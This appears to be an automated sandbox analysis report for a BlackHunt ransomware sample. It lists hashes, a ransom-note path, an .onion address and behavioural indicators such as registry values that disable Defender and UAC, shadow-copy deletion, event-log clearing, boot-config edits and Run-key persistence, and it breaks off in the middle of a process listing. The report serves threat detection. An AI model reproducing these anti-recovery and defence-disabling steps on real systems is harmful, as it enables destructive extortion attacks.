Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:04
Static task
static1
Behavioral task
behavioral1
Sample
8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe
Resource
win10v2004-20231215-en
General
-
Target
8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe
-
Size
707KB
-
MD5
eaceefd4eb93e1b1d0206312752a681d
-
SHA1
bf2e785ac4ffb2b12248d1da363ba1c85f42599e
-
SHA256
8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120
-
SHA512
6820973d94458d9df2c91c9673b98b5e8114723e8badeb462d0b54b68407484c0f15142b56d7c707de7477d664f1c536b03031a30a19c67d0de264a5ce417ce3
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1U8vvnh:6uaTmkZJ+naie5OTamgEoKxLWXnh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3872 fsutil.exe 680 fsutil.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3824 wevtutil.exe 2008 wevtutil.exe 3924 wevtutil.exe 2908 wevtutil.exe 2456 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2216 bcdedit.exe 1216 bcdedit.exe 4088 bcdedit.exe 3968 bcdedit.exe -
Renames multiple (2914) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2604 wbadmin.exe 2860 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3828 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\X: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\G: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\K: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\O: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\A: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\J: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\Z: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\Q: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\R: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\Y: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\V: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\N: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\E: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\U: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\I: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\P: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\L: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\B: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\M: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\T: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened (read-only) \??\S: 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yellowknife 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#BlackHunt_ReadMe.txt 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files (x86)\MSBuild\#BlackHunt_ReadMe.hta 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#BlackHunt_ReadMe.txt 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#BlackHunt_Private.key 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\#BlackHunt_ReadMe.txt 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\#BlackHunt_Private.key 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-nodes.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\#BlackHunt_Private.key 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\#BlackHunt_ReadMe.hta 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CST6CDT 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files (x86)\Google\#BlackHunt_ReadMe.hta 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_SelectionSubpicture.png 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#BlackHunt_Private.key 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_Private.key 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationRight_ButtonGraphic.png 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\vlc.mo 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\7-Zip\descript.ion 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_Private.key 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\#BlackHunt_Private.key 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.xml 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#BlackHunt_ReadMe.txt 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_ReadMe.txt 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\#BlackHunt_ReadMe.hta 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#BlackHunt_ReadMe.txt 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1992 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2724 vssadmin.exe 3916 vssadmin.exe 1344 vssadmin.exe 1504 vssadmin.exe 1424 vssadmin.exe 2400 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 1692 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ schtasks.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 schtasks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2668 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 964 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe Token: SeRestorePrivilege 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe Token: SeBackupPrivilege 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe Token: SeTakeOwnershipPrivilege 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe Token: SeAuditPrivilege 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe Token: SeSecurityPrivilege 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe Token: SeIncBasePriorityPrivilege 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe Token: SeBackupPrivilege 2768 vssvc.exe Token: SeRestorePrivilege 2768 vssvc.exe Token: SeAuditPrivilege 2768 vssvc.exe Token: SeBackupPrivilege 3756 wbengine.exe Token: SeRestorePrivilege 3756 wbengine.exe Token: SeSecurityPrivilege 3756 wbengine.exe Token: SeSecurityPrivilege 3824 wevtutil.exe Token: SeBackupPrivilege 3824 wevtutil.exe Token: SeSecurityPrivilege 3924 wevtutil.exe Token: SeBackupPrivilege 3924 wevtutil.exe Token: SeSecurityPrivilege 2008 wevtutil.exe Token: SeBackupPrivilege 2008 wevtutil.exe Token: SeSecurityPrivilege 2908 wevtutil.exe Token: SeBackupPrivilege 2908 wevtutil.exe Token: SeSecurityPrivilege 2456 wevtutil.exe Token: SeBackupPrivilege 2456 wevtutil.exe Token: SeDebugPrivilege 1692 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2460 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 29 PID 2180 wrote to memory of 2460 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 29 PID 2180 wrote to memory of 2460 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 29 PID 2180 wrote to memory of 2460 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 29 PID 2180 wrote to memory of 1424 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 30 PID 2180 wrote to memory of 1424 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 30 PID 2180 wrote to memory of 1424 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 30 PID 2180 wrote to memory of 1424 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 30 PID 2180 wrote to memory of 2876 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 31 PID 2180 wrote to memory of 2876 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 31 PID 2180 wrote to memory of 2876 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 31 PID 2180 wrote to memory of 2876 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 31 PID 2180 wrote to memory of 2692 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 127 PID 2180 wrote to memory of 2692 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 127 PID 2180 wrote to memory of 2692 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 127 PID 2180 wrote to memory of 2692 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 127 PID 2180 wrote to memory of 2348 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 35 PID 2180 wrote to memory of 2348 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 35 PID 2180 wrote to memory of 2348 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 35 PID 2180 wrote to memory of 2348 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 35 PID 2180 wrote to memory of 2704 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 37 PID 2180 wrote to memory of 2704 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 37 PID 2180 wrote to memory of 2704 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 37 PID 2180 wrote to memory of 2704 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 37 PID 2180 wrote to memory of 2796 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 39 PID 2180 wrote to memory of 2796 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 39 PID 2180 wrote to memory of 2796 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 39 PID 2180 wrote to memory of 2796 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 39 PID 2180 wrote to memory of 2828 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 40 PID 2180 wrote to memory of 2828 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 40 PID 2180 wrote to memory of 2828 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 40 PID 2180 wrote to memory of 2828 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 40 PID 2180 wrote to memory of 2824 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 42 PID 2180 wrote to memory of 2824 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 42 PID 2180 wrote to memory of 2824 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 42 PID 2180 wrote to memory of 2824 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 42 PID 2180 wrote to memory of 2800 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 43 PID 2180 wrote to memory of 2800 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 43 PID 2180 wrote to memory of 2800 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 43 PID 2180 wrote to memory of 2800 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 43 PID 2180 wrote to memory of 2756 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 44 PID 2180 wrote to memory of 2756 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 44 PID 2180 wrote to memory of 2756 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 44 PID 2180 wrote to memory of 2756 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 44 PID 2180 wrote to memory of 2724 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 148 PID 2180 wrote to memory of 2724 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 148 PID 2180 wrote to memory of 2724 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 148 PID 2180 wrote to memory of 2724 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 148 PID 2180 wrote to memory of 2392 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 47 PID 2180 wrote to memory of 2392 2180 8a6de728e7a12c269c2260ca31c684962ee64e5e6a6688b8fd2dab09b8462120.exe 47 PID 2180 wrote to memory of 2392 